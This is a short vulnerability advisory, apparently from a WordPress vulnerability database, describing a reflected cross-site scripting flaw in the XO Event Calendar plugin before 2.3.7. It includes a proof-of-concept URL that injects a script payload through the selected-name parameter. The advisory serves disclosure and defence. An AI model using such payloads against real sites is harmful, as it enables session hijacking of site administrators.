WordPress Plugin Vulnerabilities
XO Event Calendar < 2.3.7 - Reflected Cross-Site Scripting
Description
The plugin does not escape the selected-name parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue
Proof of Concept
https://example.com/wp-admin/edit.php?post_type=xo_event&page=xo-event-holiday-settings&selected-name="><script>alert(/XSS/)</script>
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-01 (about 2 years ago)
Added
2021-09-01 (about 2 years ago)
Last Updated
2021-09-01 (about 2 years ago)